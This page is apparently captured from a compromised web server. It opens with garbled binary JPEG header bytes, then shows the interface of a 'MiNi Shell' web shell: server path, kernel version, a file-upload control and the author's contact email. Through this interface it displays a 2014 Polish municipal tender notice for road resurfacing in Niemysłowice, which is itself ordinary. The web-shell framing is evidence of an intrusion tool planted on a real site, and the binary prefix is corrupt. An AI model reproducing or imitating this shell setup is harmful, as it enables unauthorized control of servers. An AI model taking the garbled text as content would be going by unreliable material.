JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140910/300608-N-2014.html

<p class="kh_header"><b>Prudnik: Odtworzenie nawierzchni drogowych w miejscowości Niemysłowice 
w ramach realizacji operacji pn. Budowa sieci kanalizacyjnej sanitarnej grawitacyjnej wraz z przyłączami w miejscowości Niemysłowice</b><br>
<b>Numer ogłoszenia: 300608 - 2014; data zamieszczenia: 10.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Jednoosobowa Spółka Gminy Prudnik Sp. z o.o. , ul. Poniatowskiego 1, 48-200 Prudnik, woj. opolskie, tel. 077 4363617, faks 077 4363617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwikprudnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego ze 100% udziałem gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odtworzenie nawierzchni drogowych w miejscowości Niemysłowice 
w ramach realizacji operacji pn. Budowa sieci kanalizacyjnej sanitarnej grawitacyjnej wraz z przyłączami w miejscowości Niemysłowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest odtworzenie nawierzchni drogowych w miejscowości Niemysłowice.
Odtworzenie nawierzchni drogowych po budowie sieci kanalizacji sanitarnej z podziałem na 2 części:

Część nr 1:
- odtworzenie nawierzchni drogowych w miejscowości Niemysłowice - droga gminna i osiedle (dz. nr. 645; dz. nr. 673 obręb Niemysłowice).
Powierzchnia warstwy wiążącej oraz ścieralnej: 530,00 m2

Część nr 2:
- odtworzenie nawierzchni drogowych w miejscowości Niemysłowice  - droga gminna (dz. nr. 625/1; dz. nr. 626 obręb Niemysłowice). 
Powierzchnia warstwy wiążącej oraz ścieralnej: 1850,00 m2.
II. Zakres robót drogowych, które należy wykonać w ramach niniejszego zamówienia.

1. Zakres robót przewidziany dla każdej części  zamówienia:
a) wycięcie lub sfrezowanie uszkodzonych miejsc nawierzchni z nadaniem regularnych kształtów, 
b) wykorytowanie podłoża pod budowę warstw konstrukcyjnych i nowej nawierzchni w śladzie wykopu,
c) profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w śladzie wykopu,
d) wykonanie podbudowy  - warstwy dolnej z kruszywa łamanego (tłucznia) o grubości warstwy 20 cm po zagęszczeniu w śladzie wykopu,
e) wykonanie podbudowy  - warstwy górnej z kruszywa łamanego (tłucznia) o grubości warstwy 10 cm po zagęszczeniu w śladzie wykopu (podbudowa pod ułożenie warstw mineralno - bitumicznych),
f) ułożenie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych - warstwa wiążąca asfaltowa o grubości po zagęszczeniu 4 cm w śladzie wykopu:
[cześć nr 1. pow. warstwy wiążącej: 530,00 m2 ]
[cześć nr 2. pow. warstwy wiążącej: 1850,00].

g) ułożenie nawierzchni z mieszanki mineralno - bitumicznych asfaltowych - warstwa ścieralna o grubości 4 cm  w śladzie wykopu:
[cześć nr 1. pow. warstwy ścieralne: 530,00 m ]
[cześć nr 2. pow. warstwy ścieralnej: 1850,00].

h) ułożenie do niwelety drogi wszystkich urządzeń infrastruktury wodociągowej i kanalizacyjne.

2. Materiały użyte do zabudowy winny spełniać wymagania techniczne (rekomendowane przez Ministra Infrastruktury).
3. Zamawiający dokładnie wskaże w terenie miejsca przeznaczone do przeprowadzenia prac odtworzenia nawierzchni.
4. Zadaniem Wykonawcy zamówienia jest nawiązanie się do istniejącej niwelety drogi. 
5. Mieszanka mineralno - asfaltowa powinna być wbudowywana rozładowarką wyposażona w układ automatycznego sterowania grubości warstwy i utrzymywania niwelety drogi. Warstwy wałowane powinny być równomiernie zagęszczone ciężkimi walcami drogowymi.
W miejscach niedostępnych dla sprzętu dopuszcza się wbudowanie ręczne.
6. Roboty odtworzeniowe powinny być wykonane dokładnie, wszystkie urządzenia infrastruktury wodociągowej (hydranty, skrzynki żeliwne uliczne, zasuwy) i kanalizacyjnej (włazy kanalizacyjne) powinny być dostosowane przez Wykonawcę do niwelety drogi.
7. Wykonawca na własny koszt zutylizuje wszelkie odpady asfaltowe powstałe w trakcie prowadzonych robót.
8. Wykonawca zamówienia musi dokonać zagęszczenia podbudowy jezdni, uzyskując wskaźnik zagęszczenia Is=1,02. Wykonawca musi skontrolować wskaźnik zagęszczenia przed ułożeniem warstw bitumicznych, w miejscach wskazanych przez Zamawiającego, co należy udokumentować protokołami z pomiaru. 
Obowiązkiem Wykonawcy jest przekazanie protokołów badań zagęszczenia Zamawiającemu.
9. Wielkości przewidywane w ramach każdego zadania przez Zamawiającego są wielkościami orientacyjnymi podanymi w celu obliczenia ceny jednostkowej przez Wykonawcę i dokonania oceny ofert przez Zamawiającego.
Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. do 50 % wartości zamówienia podstawowego.
Jakakolwiek różnica pomiędzy rzeczywistą ilością wykonanych robót, a podaną ilością w przez Zamawiającego w SIWZ nie będzie podstawą do zmiany cen jednostkowych.
III. Wymagania stawiane Wykonawcy.
1) Wykonawca zamówienia zobowiązany jest do:
- wykonania zadania zgodnie z sztuka budowlaną i obowiązującymi przepisami; 
- posiadania niezbędnych urządzeń i sprzętu umożliwiającego prawidłowe, dokładne i należyte wykonanie prac budowlanych;
- dostarczenia, zainstalowania i obsługi wszystkich tymczasowych urządzeń zabezpieczających takich jak: znaki, zapory, światła ostrzegawcze, sygnały itp. Zapewniając w ten sposób bezpieczeństwo pojazdów i pieszych. Wykonawca zapewni stałe warunki widoczności w dzień i w nocy tych zapór i znaków, dla których jest to nieodzowne ze względów bezpieczeństwa. 
Koszt zabezpieczenia terenu budowy nie podlega odrębnej zapłacie i przyjmuje się, że jest włączony w cenę kontraktową; 
- prowadzenia robót zgodnie z wszelkimi przepisami dotyczącymi ochrony środowiska naturalnego;
- przestrzegania przepisów ochrony przeciwpożarowej;
- odpowiedzialności za ochronę instalacji na powierzchni i pod powierzchnia odtwarzanej drogi; 
- przestrzegania przepisów dotyczących bezpieczeństwa i higieny pracy oraz należyte wyposażenie BHP
- przeprowadzenia wizji lokalnej. 

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnych wpływu, na jakość wykonanych robót. Sprzęt będący własnością Wykonawcy lub wynajęty do wykonania robót ma być utrzymywany w dobrym stanie i gotowości do pracy. Powinien być zgodny z normami ochrony środowiska i przepisami dotyczącymi jego użytkownika.
Wykonawca będzie usuwać na bieżąco, na własny koszt: wszelkie zanieczyszczenia, odpady asfaltowe powstałe na skutek prowadzonych robót, uszkodzenia spowodowane jego pojazdami na drogach publicznych oraz dojazdowych do terenu prowadzenia budowy.

IV. Wymagania organizacyjne:
- przed przystąpieniem do robót Wykonawca zamówienia - kierownik robót powiadomi właściciela działki o zamiarze rozpoczęcia prac, spisze z Zamawiającym protokół przekazania terenu. Uprawniony kierownik z ramienia Wykonawcy spisze oświadczenie o przejęciu obowiązków kierownika.
- Wykonawca jest zobowiązany do wniesienia ewentualnych opłat za zajęcie pasa drogowego na czas wykonania przedmiotu zamówienia.
- Wykonawca robót zapewni nadzór techniczny oraz obsługę geodezyjną zamówienia, nadzór nad pracownikami w zakresie porządku i dyscypliny pracy, koordynację działań ewentualnych podwykonawców, zapewni pracownikom warunki socjalne, zabezpieczy zaplecze budowy, oznakuje i zabezpieczy teren wykonywania prac.
- Wykonawca jest odpowiedzialny, za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
- Kierownik robót zobowiązany jest do dokonania wpisów do dziennika budowy.  

V. Wizja lokalna:
Zamawiający wymaga od Wykonawcy przeprowadzenia wizji lokalnej w miejscowości Niemysłowice - w miejscu planowanych robót odtworzenia nawierzchni.
W trakcie wizji lokalnej Wykonawca będzie mógł zapoznać się z terenem i warunkami prowadzenia prac w celu prawidłowej wyceny zamówienia oraz poprawnym sporządzeniu oferty.
Wizja lokalna musi odbyć się do dnia 26.09.2014 r. Termin wizji lokalnej powinien być ustalony z Zamawiającym telefonicznie lub pisemnie, z co najmniej 1 dniowym wyprzedzeniem. Przeprowadzenie wizji lokalnej będzie udokumentowane spisaniem protokołu. 

Zamawiający zastrzega, że oceniane będą tylko te oferty Wykonawców, którzy przeprowadzili wizje lokalną w miejscu wskazanym przez Zamawiającego.
VI.  Warunki gwarancji i rękojmi: 
Wykonawca udzieli Zamawiającemu minimum 36 miesięcy gwarancji i rękojmi obejmujący cały zakres zamówienia.
Okres gwarancji i rękojmi liczony jest od daty podpisania (bez uwag) protokołu końcowego. 
Opis gwarancji zawarto w umowie i załączniku nr 10 do SIWZ - karta gwarancji.
Wykonawca musi załączyć parafowany do oferty podpisany wzór karty gwarancyjnej - załącznik nr 10 do SIWZ.

VII. Do oferty przetargowej Wykonawcy ubiegający się o zamówienie muszą załączyć w języku polskim:
- kosztorys ofertowy sporządzony na podstawie SIWZ dla każdej części zamówienia,
-  aprobaty techniczne i deklaracje zgodności na materiały, jakie będą wykorzystane do odtworzenia nawierzchni drogowych (wzory).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. do 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 5 000,00 zł. (słownie: pięć tysięcy złotych).
Wadium wnosi się przed upływem terminu składania ofert.
W przepadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego:
            ING Bank Śląski S.A. O/Nysa
             Nr rachunku: 58 1050 1490 1000 0022 7794 8770.
Do oferty należy dołączyć oryginał lub kopię polecenia przelewu potwierdzoną za zgodność z oryginałem.
Wadium wnoszone w innych dopuszczalnych przez Zamawiającego formach w oryginale dołączyć do oryginału oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wskazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, iż Wykonawca spełnił warunki w zakresie wiedzy i doświadczenia:
Jeśli wykaże, że w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenia niniejszego zamówienia, a jeśli okres działalności Wykonawcy jest krótszy to w okresie tej działalności, co najmniej dwóch różnych zadań polegających na budowie lub przebudowie, remoncie dróg o nawierzchni bitumicznej o wartości nie mniejszej niż 100 000,00 PLN każde zadanie. W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest przedłożyć:
- wykaz wykonanych zamówień w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielnie niniejszego zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 6. 
Wykonawca załącza do dokumentacji ofertowej dokumenty potwierdzające, że te roboty drogowe zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wskazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca:
wykaże, iż dysponuje osobą, która będzie pełnić obowiązki kierownika robót drogowych.
Osoba ta musi posiadać: 
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na postawie wcześniej obowiązujących przepisów.
Wykonawca musi przedstawić w ofercie informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia wyżej opisanej osoby, która będzie uczestniczyć w wykonaniu zamówienia.
Osoba przedstawi dokument, że jest członkiem izby inżynierów.
Osoba ta musi uczestniczyć, kierować i prowadzić nadzór nad robotami branżowymi w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wskazać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aprobaty techniczne i deklaracje zgodności na materiały, jakie będą wykorzystane do odtworzenia nawierzchni drogowych (wzory).</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwikprudnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa
Spółka Gminy Prudnik z o. o. ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 10:00, miejsce: Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa
Spółka Gminy Prudnik z o. o. ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na
lata 2007/2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com